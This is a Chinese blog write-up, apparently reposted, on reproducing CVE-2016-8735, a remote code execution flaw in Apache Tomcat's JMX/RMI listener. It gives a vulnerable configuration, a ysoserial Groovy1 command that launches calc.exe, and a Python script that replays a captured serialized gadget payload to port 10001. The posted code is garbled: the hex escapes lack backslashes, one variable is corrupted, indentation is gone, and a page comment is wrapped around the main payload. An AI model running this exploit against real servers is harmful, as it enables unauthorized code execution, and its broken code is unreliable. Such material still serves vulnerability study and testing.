前言很早之前写的一篇文章,现在分享出来网上关于cve-2016-8735的漏洞环境搭建和POC的编写大都千篇一律,几乎都是源自于Apache Tomcat Remote Code Execution(CVE-2016-8735)。但是这篇在环境搭建方面详细说明,仅仅只是说明要修改server.xml和添加两个包,POC方面也只是调用ysoserial.jar
前言
很早之前写的一篇文章,现在分享出来
网上关于cve-2016-8735的漏洞环境搭建和POC的编写大都千篇一律,几乎都是源自于Apache Tomcat Remote Code Execution(CVE-2016-8735)。但是这篇在环境搭建方面详细说明,仅仅只是说明要修改server.xml和添加两个包,POC方面也只是调用ysoserial.jar。但是在实际的环境搭建中却并不是网上所说的修改server.xml的那么简答。在POC编写方面,也不可能是直接通过ysoserial.jar,最好的方法1是能够以Python代码来实现,方便地继承到自己的产品中。
基于以上的原因。我们在环境搭建以及POC编写时遇到了各种问题,而这也是我们这篇文章的由来。
环境要求
按照网上的例子,我们搭建环境时采用的时Tomcat8.0.36,对应需要的第三方的jar包是tomcat-catalina-jmx-remote-8.0.36.jar和groovy-2.3.9。这些包的下载地址是,jmx下载地址、groovy下载地址。
remote.jar的版本需要和Tomcat的版本保持一致。
此漏洞与JDK的版本还有关。在使用Tomcat8.0.36的版本时此时需要的JDK的版本是Java 7u131/8u121以下的版本,否则部署的时候会存在问题。
实际搭建的环境时各种软件的版本如下:
- win10
- JDK1.8.111,
- Tomcat8.0.036
- tomcat-catalina-jmx-remote-8.0.36.jar
- groovy-2.3.9.jar
tomcat-catalina-jmx-remote-8.0.36.jar和groovy-2.3.9.jar需要放置在toncat的lib目录下
文件配置
配置文件的修改也不是网上所说的如此简单。
server.xml配置
配置conf/server.xml文件,添加Listener的配置<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />,则Listener的配置变为:
<Listener className="org.apache.catalina.core.JreMemoryLeakPreventionListener" />
<Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" />
<Listener className="org.apache.catalina.core.ThreadLocalLeakPreventionListener" />
<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />catalina.bat配置
配置bin/catalina.bat,在# —– Execute The Requested Command ——–处添加以下内容:
set CATALINA_OPTS=�TALINA_OPTS% -Dcom.sun.management.jmxremote=true
set CATALINA_OPTS=�TALINA_OPTS% -Dcom.sun.management.jmxremote.ssl=false
set CATALINA_OPTS=�TALINA_OPTS% -Dcom.sun.management.jmxremote.authenticate=false
set CATALINA_OPTS=�TALINA_OPTS% -Djava.rmi.server.hostname=127.0.0.1至此,所有的配置均以完成。如果能够顺利启动tomcat,那就说明配置成功。
漏洞测试
下载ysoserial.jar。运行命令java -cp ysoserial.jar ysoserial.Exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe,如果能够顺利地弹出计算机则说明漏洞已经成功利用。
POC编写
为了知道通过java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe时发送的包,我们需要使用Wireshark抓包看看内部的过程。如果是rce打的本地,那么Wireshark将抓不到包。所以在实际环境搭建中,我采用的是环境搭建在宿主机中,在虚拟机里面发送Payload。
宿主机IP: 192.168.158.1 虚拟机IP: 192.168.158.132
在虚拟机中运行java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.158.1 10001 Groovy1 calc.exe。通过Wireshark抓包,同时过滤IP为192.168.158.1的包。如下:
通过分析我们可以发现,当经过两次的交互之后,当第三次发送请求包时,最后回复了4个包。整个过程一共有9个包。
由于我们是向端口10001所以我们还可以通过进一步追踪TCP流来进行查看。为了便于分析,我们采用C Arrays的方式查看,由于数据较多,这里就不作展示。通过分析数据我们可以发现:
- 我们发送的payload其实都是Shellcode代码
2.
C Arrays模式下每一个数组表示一个请求/响应。
其中红色部分是请求包,蓝色部分是响应包。我们在实际写POC的过程中值需要使用到请求包即可。通过分析整个请求是从char peer0_2[] = {/*Packet 8 */0x4a, 0x52, 0x4d, 0x49, 0x00, 0x02, 0x4b };
我们需要获取到所有的请求包,然后进行重放。对于weblogic的返回内容仅仅只是接受不需要处理即可。在使用Python代码编写时,需要注意的是要采用bytes的方式发送数据,那么变量就需要申明为b的模式。我们通过提取所有的请求包,通过TCP的方式发送到目标站点,就可以完成POC的编写了。整个代码如下:
import socket
try:
exp_url = 'http://127.0.0.1'
host = exp_url.replace('http://', '')
port = 10001
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((host, port))
payload1 = b'x4ax52x4dx49x00x02x4b'
s.send(payload1)
s.recv(1024)
payload2 = b"x00x0fx31x39x32x2ex31x36x38x2ex31x35x38x2ex31x33x32x00x00x00x00"
s.send(payload2)
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* payload2 = b"x50xacxedx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4dxc9xd4xe6x3bxdfx74x00x11x70x77x6ex65x64x32x36x36x38x39x31x34x37x34x35x39x39x73x7dx00x00x00x01x00x0fx6ax61x76x61x2ex72x6dx69x2ex52x65x6dx6fx74x65x70x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx70x78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x70x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x71x00x7ex00x00x73x71x00x7ex00x05x73x7dx00x00x00x01x00x0dx6ax61x76x61x2ex75x74x69x6cx2ex4dx61x70x70x78x71x00x7ex00x02x73x72x00x2cx6fx72x67x2ex63x6fx64x65x68x61x75x73x2ex67x72x6fx6fx76x79x2ex72x75x6ex74x69x6dx65x2ex43x6fx6ex76x65x72x74x65x64x43x6cx6fx73x75x72x65x10x23x37x19xf7x15xddx1bx02x00x01x4cx00x0ax6dx65x74x68x6fx64x4ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx70x78x72x00x2dx6fx72x67x2ex63x6fx64x65x68x61x75x73x2ex67x72x6fx6fx76x79x2ex72x75x6ex74x69x6dx65x2ex43x6fx6ex76x65x72x73x69x6fx6ex48x61x6ex64x6cx65x72x10x23x37x1axd6x01xbcx1bx02x00x02x4cx00x08x64x65x6cx65x67x61x74x65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx4cx00x0bx68x61x6ex64x6cx65x43x61x63x68x65x74x00x28x4cx6ax61x76x61x2fx75x74x69x6cx2fx63x6fx6ex63x75x72x72x65x6ex74x2fx43x6fx6ex63x75x72x72x65x6ex74x48x61x73x68x4dx61x70x3bx70x78x70x73x72x00x29x6fx72x67x2ex63x6fx64x65x68x61x75x73x2ex67x72x6fx6fx76x79x2ex72x75x6ex74x69x6dx65x2ex4dx65x74x68x6fx64x43x6cx6fx73x75x72x65x11x0ex3ex84x8fxbdxcex48x02x00x01x4cx00x06x6dx65x74x68x6fx64x71x00x7ex00x0fx70x78x72x00x13x67x72x6fx6fx76x79x2ex6cx61x6ex67x2ex43x6cx6fx73x75x72x65x3cxa0xc7x66x16x12x6cx5ax02x00x08x49x00x09x64x69x72x65x63x74x69x76x65x49x00x19x6dx61x78x69x6dx75x6dx4ex75x6dx62x65x72x4fx66x50x61x72x61x6dx65x74x65x72x73x49x00x0fx72x65x73x6fx6cx76x65x53x74x72x61x74x65x67x79x4cx00x03x62x63x77x74x00x3cx4cx6fx72x67x2fx63x6fx64x65x68x61x75x73x2fx67x72x6fx6fx76x79x2fx72x75x6ex74x69x6dx65x2fx63x61x6cx6cx73x69x74x65x2fx42x6fx6fx6cx65x61x6ex43x6cx6fx73x75x72x65x57x72x61x70x70x65x72x3bx4cx00x08x64x65x6cx65x67x61x74x65x71x00x7ex00x11x4cx00x05x6fx77x6ex65x72x71x00x7ex00x11x5bx00x0ex70x61x72x61x6dx65x74x65x72x54x79x70x65x73x74x00x12x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx4cx00x0ax74x68x69x73x4fx62x6ax65x63x74x71x00x7ex00x11x70x78x70x00x00x00x00x00x00x00x02x00x00x00x00x70x74x00x08x63x61x6cx63x2ex65x78x65x71x00x7ex00x19x75x72x00x12x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex43x6cx61x73x73x3bxabx16xd7xaexcbxcdx5ax99x02x00x00x70x78x70x00x00x00x02x76x72x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00x70x78x70x76x72x00x0cx6ax61x76x61x2ex69x6fx2ex46x69x6cx65x04x2dxa4x45x0ex0dxe4xffx03x00x01x4cx00x04x70x61x74x68x71x00x7ex00x0fx70x78x70x70x74x00x07x65x78x65x63x75x74x65x73x72x00x26x6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex43x6fx6ex63x75x72x72x65x6ex74x48x61x73x68x4dx61x70x64x99xdex12x9dx87x29x3dx03x00x03x49x00x0bx73x65x67x6dx65x6ex74x4dx61x73x6bx49x00x0cx73x65x67x6dx65x6ex74x53x68x69x66x74x5bx00x08x73x65x67x6dx65x6ex74x73x74x00x31x5bx4cx6ax61x76x61x2fx75x74x69x6cx2fx63x6fx6ex63x75x72x72x65x6ex74x2fx43x6fx6ex63x75x72x72x65x6ex74x48x61x73x68x4dx61x70x24x53x65x67x6dx65x6ex74x3bx70x78x70x00x00x00x0fx00x00x00x1cx75x72x00x31x5bx4cx6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex43x6fx6ex63x75x72x72x65x6ex74x48x61x73x68x4dx61x70x24x53x65x67x6dx65x6ex74x3bx52x77x3fx41x32x9bx39x74x02x00x00x70x78x70x00x00x00x10x73x72x00x2ex6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex43x6fx6ex63x75x72x72x65x6ex74x48x61x73x68x4dx61x70x24x53x65x67x6dx65x6ex74x1fx36x4cx90x58x93x29x3dx02x00x01x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x70x78x72x00x28x6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex6cx6fx63x6bx73x2ex52x65x65x6ex74x72x61x6ex74x4cx6fx63x6bx66x55xa8x2cx2cxc8x6axebx02x00x01x4cx00x04x73x79x6ex63x74x00x2fx4cx6ax61x76x61x2fx75x74x69x6cx2fx63x6fx6ex63x75x72x72x65x6ex74x2fx6cx6fx63x6bx73x2fx52x65x65x6ex74x72x61x6ex74x4cx6fx63x6bx24x53x79x6ex63x3bx70x78x70x73x72x00x34x6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex6cx6fx63x6bx73x2ex52x65x65x6ex74x72x61x6ex74x4cx6fx63x6bx24x4ex6fx6ex66x61x69x72x53x79x6ex63x65x88x32xe7x53x7bxbfx0bx02x00x00x70x78x72x00x2dx6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex6cx6fx63x6bx73x2ex52x65x65x6ex74x72x61x6ex74x4cx6fx63x6bx24x53x79x6ex63xb8x1exa2x94xaax44x5ax7cx02x00x00x70x78x72x00x35x6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex6cx6fx63x6bx73x2ex41x62x73x74x72x61x63x74x51x75x65x75x65x64x53x79x6ex63x68x72x6fx6ex69x7ax65x72x66x55xa8x43x75x3fx52xe3x02x00x01x49x00x05x73x74x61x74x65x70x78x72x00x36x6ax61x76x61x2ex75x74x69x6cx2ex63x6fx6ex63x75x72x72x65x6ex74x2ex6cx6fx63x6bx73x2ex41x62x73x74x72x61x63x74x4fx77x6ex61x62x6cx65x53x79x6ex63x68x72x6fx6ex69x7ax65x72x33xdfxafxb9xadx6dx6fxa9x02x00x00x70x78x70x00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x73x71x00x7ex00x26x73x71x00x7ex00x2ax00x00x00x00x3fx40x00x00x70x70x78x74x00x08x65x6ex74x72x79x53x65x74x76x72x00x12x6ax61x76x61x2ex6cx61x6ex67x2ex4fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x78x71x00x7ex00x4f"
*/
s.send(payload2)
s.close()
print("test")
except OSError as msg:
print(msg)
pass通过结合Wireshark和这里的Python代码,详细就能过对整个POC的编写有一个十分清晰的了解了。为了方便复现,保留了一份Wireshark的交互包。wireshark请求包
其他
当然以上还不是一个完整的payload,因为作为POC来说,在对方的服务器上面弹计算机是没有意义的。面对这种这种问题,我们可以通过dnslog的方式来判断。编写payload的方法还是一样,按照上述的操作如法炮制就可以了。
文由https://blog.spoock.com/2019/09/20/cve-2016-8735/
